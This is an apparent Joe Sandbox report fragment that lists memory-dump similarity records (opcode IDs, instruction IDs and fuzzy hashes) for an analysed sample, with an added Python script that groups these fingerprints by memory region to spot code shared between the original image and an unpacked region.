                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50e165b6bb7c753b88c47e3f014378d88afe1eccc8203488f2895be52c8ee4ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2413A766587814BD3298A35C862773BFA3AFA3308F1C947DC4D38B656DB39A10B8710
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7f4536cca71d1d420f26cfe0a42acfad6fc09b98fb4c506e7ec207e1e3710ef5
                                                                                                                                                                                                                                        • Instruction ID: 00f4e2759825dcf10c6fc0e57a4f65ea5fa50f8fe0cbaea4274dafa2f605c2a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f4536cca71d1d420f26cfe0a42acfad6fc09b98fb4c506e7ec207e1e3710ef5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA4128726147414BD3298B35C8A23B3BBA3EBA6304F1C846EC4D38B756DB3DA50B8754
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
                                                                                                                                                                                                                                        • Instruction ID: 81e35b3c9639f653e4b78af3b6a19cb59e4b3dfb7a7f92bcc5250c98de83f962
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E5126766483118BC718CF65C89166BB7E2FFC9304F19DA2EE4C69B390DB749801CB86
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
• Instruction ID: 618579726118e679aa1534d0b4440190eb114bb965ab7fb83873a39d39203c85
• Opcode Fuzzy Hash: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
• Instruction Fuzzy Hash: 3E5136766083118BC718DF64D89266BB7E2FFD4304F18DA2EE4C69B390DB749801C786
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
• Instruction ID: 6085e876b09a2a4ee967cc73ad16ecd698c2875847a3188e517866274535cc44
• Opcode Fuzzy Hash: 3c7ccca648bacceba5ebfdb24a7e27f770f2e897686419ce5b318d0413d75915
• Instruction Fuzzy Hash: 6E4129726547414BD32A8A35C8623B3BB93EBE2304F1C946EC4D387792D77D940B8354
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction ID: 5350e738b0a196d36946ff1cbfe237b463a01ccf3c5656d9fa89a9140fc46514
• Opcode Fuzzy Hash: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction Fuzzy Hash: AC513CB15087548FE314DF29D89475BBBE1BBC4318F144A2DE5E987390E37AD6088F82
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction ID: 0c6b8ba10c1c17cacf5a651755a68f3586d4d6297ac1e50e8e02080b14342633
• Opcode Fuzzy Hash: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction Fuzzy Hash: D0515DB15087548FE314DF29D49535BBBE1BBC8318F044E2EE4E987351E379DA088B96
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9c3875382c78234133a2a0b030691dc1d9056c16a73f6806e133a01e98343d6
• Instruction ID: 26aced47306ba8243eb9efc204361966fa7a7ce3dd7d84c478a3f5587c373eec
• Opcode Fuzzy Hash: d9c3875382c78234133a2a0b030691dc1d9056c16a73f6806e133a01e98343d6
• Instruction Fuzzy Hash: AC514939A08311CFD7109F64D89026AB3E1FB8A315F0D847ED48997360D339D886CB4A
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 1ad63d2833fcd389e14ee1a20c9ffcf4e94d522de2ff97664ec2677c5493ab0a
• Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction Fuzzy Hash: BA51B3B19047419FD3209F28DC8871AB7A5AF85338F14473CECA9972E0E771E915CB8A
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 08a7e479931a5a61fa7b69175e4513341166876bb814eb369fc510c4807828e1
• Opcode Fuzzy Hash: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction Fuzzy Hash: 6651C1B19047019BD3109F389D4871BB7A4BB85338F14473DE8A9A73E1E378E915CB8A
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
• Instruction ID: 5f0f1636741ac1ebcb5a73bd463cdadc9265b8136139558992e9a208ca8c1688
• Opcode Fuzzy Hash: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
• Instruction Fuzzy Hash: AB517C337899D05BD72D8A3C4C522667A874BE7234B2EC77EE4F5CB3E2D66588018358
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
• Instruction ID: 54c58fb9e562efe4acf2d46a46492020a6cdaf8e3d7bcc25f04f53f15c8a0988
• Opcode Fuzzy Hash: 9fbb2256b73ed4c3e9d4811186088e06edc7d415f1e30715e8a68ccf3e40502c
• Instruction Fuzzy Hash: 435169377499A15BD7288A3C5C222667A830BEB238F3ED76FE4B1CB3E5D55C88024345
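The records above list the same Opcode ID (for example bd2c80c2..., 76e94ee5... and 9fbb2256...) once for the PE-backed image at 00400000 and once for the non-PE region at 02100000, each time with a different Instruction ID. That pairing is what a reader checking the "Detected unpacking" signatures wants to pull out of this section mechanically. The following is an added example, not part of the Joe Sandbox report or its plugin: a small parser for these "Memory Dump Source" records (the bullet-label layout shown on this page; the record boundaries and field names are my reading of it, not a documented Joe Sandbox format) that groups Opcode IDs by memory region and reports the ones present in more than one region. The sample text is constructed from six records copied from this section.

```python
import re

RECORD_START = "Memory Dump Source"
# "• Key: value" bullet lines; the value may itself contain colons.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
# Region offset and PE flag inside the "Source File" value.
SOURCE_RE = re.compile(
    r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)

# Constructed sample: six records taken from this report's similarity listing,
# reduced to the fields the parser uses (assumption: the layout shown on the page).
SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: beb234027a56441d2e590b2ce743a9196137ad24ac020d59d7cdb2a6eb68ddef
• Instruction ID: 618579726118e679aa1534d0b4440190eb114bb965ab7fb83873a39d39203c85
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
• Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction ID: 5350e738b0a196d36946ff1cbfe237b463a01ccf3c5656d9fa89a9140fc46514
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: bd2c80c23f364ae32a5c5ea9ca16968fea39fdfc7921c6944e5ca5627ebbab6b
• Instruction ID: 0c6b8ba10c1c17cacf5a651755a68f3586d4d6297ac1e50e8e02080b14342633
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 1ad63d2833fcd389e14ee1a20c9ffcf4e94d522de2ff97664ec2677c5493ab0a
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 76e94ee5ef1ec981491ae59ea2b09b41901541db9a92759e325bf4aa5bc5ab3c
• Instruction ID: 08a7e479931a5a61fa7b69175e4513341166876bb814eb369fc510c4807828e1
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: d9c3875382c78234133a2a0b030691dc1d9056c16a73f6806e133a01e98343d6
• Instruction ID: 26aced47306ba8243eb9efc204361966fa7a7ce3dd7d84c478a3f5587c373eec
"""


def parse_records(text):
    """Split the listing into one dict per 'Memory Dump Source' record.

    Each dict carries the region offset (int), whether the dump was PE-backed,
    and the Opcode / Instruction IDs. Records missing an offset or Opcode ID
    (e.g. a record cut off at the end of a page) are dropped.
    """
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == RECORD_START:
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Source File":
            s = SOURCE_RE.search(value)
            if s:
                current["offset"] = int(s.group("offset"), 16)
                current["based_on_pe"] = s.group("pe") == "true"
        elif key == "Opcode ID":
            current["opcode_id"] = value
        elif key == "Instruction ID":
            current["instruction_id"] = value
    return [r for r in records if "opcode_id" in r and "offset" in r]


def opcodes_by_region(records):
    """Map each Opcode ID to the set of region offsets it was reported in."""
    by_opcode = {}
    for r in records:
        by_opcode.setdefault(r["opcode_id"], set()).add(r["offset"])
    return by_opcode


def shared_opcodes(records):
    """Opcode IDs that appear in more than one memory region.

    For a sample flagged as unpacking, a function fingerprint seen both in the
    original image and in a freshly allocated non-PE region is the kind of
    overlap worth inspecting first.
    """
    return {op: regions for op, regions in opcodes_by_region(records).items()
            if len(regions) > 1}


def region_only_opcodes(records, offset):
    """Opcode IDs reported solely in the region at `offset`."""
    return {op for op, regions in opcodes_by_region(records).items()
            if regions == {offset}}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for op, regions in sorted(shared_opcodes(recs).items()):
        print(op[:16], "in", ", ".join(f"{r:08X}" for r in sorted(regions)))
```

Run against the full similarity section rather than the sample, the same functions give the whole set of fingerprints that straddle the 00400000 image and the 02100000 region; `region_only_opcodes(recs, 0x2100000)` then narrows to code that exists only in the injected region.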
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
• Instruction ID: e1823091626b326294abfe3b7d6e57fc6c03bc54f3121d8daf91cc083ee93afa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F651CE33E15A304BD7259D7D8C8126ABA926B86730F2A837AED75EB3D0D7349D0183C1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction ID: 871487b85ee081f61f96075d83eee7838f6093090311bf861c268766400ad4d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa77b6908eab7f3669129dd6270d874e2da5e3f843f0bb40ad558b4d72932a7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6751E573E159304BD7249D7D9C8125BBA926B86330F2A833AED75EB3D0D6389D0143C5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                        • Instruction ID: 0b378c3cbfe096d3c88575fb66abcd29c7352c0291cafe4bd6dbcdb42f859ddf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29d48deba50488b5831cc48becd701077cdc31f4289528a70b5869d65e44ecfb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72513CB29482815FD724CF2CC89177AB7E6AFD5214F084A7DE0DAC7292E736D905CB42
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                        • Instruction ID: 8b6b96cede083ea36f15af2067a5aaad4563b90d44a4abde3f953a97813795d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D415971A443146FE7159F64DC80B6BBBA6EF85B04F15842DFD85A7150EB32E804CBD2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
                                                                                                                                                                                                                                        • Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6946c5d2f57fcbacdc517e199e457a610470862e953e395443f30e92702119ba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0babd5f88c635bffeceb70a9eb6c40063d50fae8a59a64af2ce8687b780a5886
                                                                                                                                                                                                                                        • Instruction ID: d4f460c3b89c2f4431363bb8f0e01f1efb99063a2f49f34543986331488da25a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0babd5f88c635bffeceb70a9eb6c40063d50fae8a59a64af2ce8687b780a5886
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3131D2315483804FD308CF29889262BFBE2ABCA314F59D96DE895CB266DB38D541CB41
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                        • Instruction ID: 7ca20e6db2e6ef2265e777abb508c1958a0f788c65ef0e31ff64c86ef239d1f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE414237B506514BC31C8E64C8E23AAFBA2FF8921471E512DC955D7795D7B8980247C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                        • Instruction ID: 0879eb64182fa33bd680848163e7b412a319af03fbceb7a9ba4b6aa96abc02f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5e5745a9e04c2a491c48c9e8dc2ff63359ea52b338f82eca13cde478cb73e3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51416033B106518BC71C8E68C9923AAFBA3FB8A310B1E523EC955AB785D77C9C1147C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
• Instruction ID: a6b4377e208e3fc368da79758147d215748999cd425d17428e791f5e04301b56
• Opcode Fuzzy Hash: e063f326ffa53de25d0b9ba43cf0ed4dbc710327434a92a2670b2cdd79f8318c
• Instruction Fuzzy Hash: 0B3125312447818FCB288F39D4617ABBBF1DB4A218F18456CC1D387782C339A546CB14
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ae25d083d9d1e4131833b1f6946fc4f4cdc4c36b51baf168cbdfb307b6f812c
• Instruction ID: f81eb2cd5989d868f824b990d4dd2db3b11f7867acd7d29f2a686ef0f787acd2
• Opcode Fuzzy Hash: 9ae25d083d9d1e4131833b1f6946fc4f4cdc4c36b51baf168cbdfb307b6f812c
• Instruction Fuzzy Hash: CE3101312047908BCB288F29C4913ABBBF1DB5A314F18596DC1D787782C33DA8868B58
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2ce6c0da914478739eba616fd4154f3e88796775ada538367235ffdeb7569ea
• Instruction ID: 863b80575b49267229f43e4714138745a281d2b18c2071d2ee7a5f00803e43ab
• Opcode Fuzzy Hash: a2ce6c0da914478739eba616fd4154f3e88796775ada538367235ffdeb7569ea
• Instruction Fuzzy Hash: B92128705496C29FDB258B34C850BF6BFA4EF53309F2818ADC1C2C7542E736A11AC760
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76527fec73d1f8eb49db5acfa1051ee8520abf24bbbb1d2dd5704f55b6ff4508
• Instruction ID: 6e138cb6fd9e5e0f0caf11801ec2ce96e74ed1cdd16602e21eaa68cbd0470f93
• Opcode Fuzzy Hash: 76527fec73d1f8eb49db5acfa1051ee8520abf24bbbb1d2dd5704f55b6ff4508
• Instruction Fuzzy Hash: F52128705086C28FD7258B34C8507F3BBA1EF63308F18149ED1C387243E769A55AC769
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
• Instruction ID: e2395e4ab933c41987fbc22ff40db7d5378df9d6869891d1efcd9d15971fdb67
• Opcode Fuzzy Hash: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
• Instruction Fuzzy Hash: 8C21F3382D81B10BD7288F3898F8576F791D78721272A027FEEC2C3382D3A59955C764
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
• Instruction ID: 049965bb47efd5a04a2fd3c18b74188d46e65301c4fa73dca4455e1bd43b6f7b
• Opcode Fuzzy Hash: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
• Instruction Fuzzy Hash: 9921D4382581B10BD7188F3C98F4577F7A0A787312729027FEBC2933D2D668A9559668
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
• Instruction ID: 7651034275103393deca0637358bc49e6e8de9b4155624b2cf4551bfeb953b2f
• Opcode Fuzzy Hash: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
• Instruction Fuzzy Hash: 7721BB71645B408FE721CF22C8917A7BBF2EB85314F05996DC1C297A95CBB8A4068B44
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
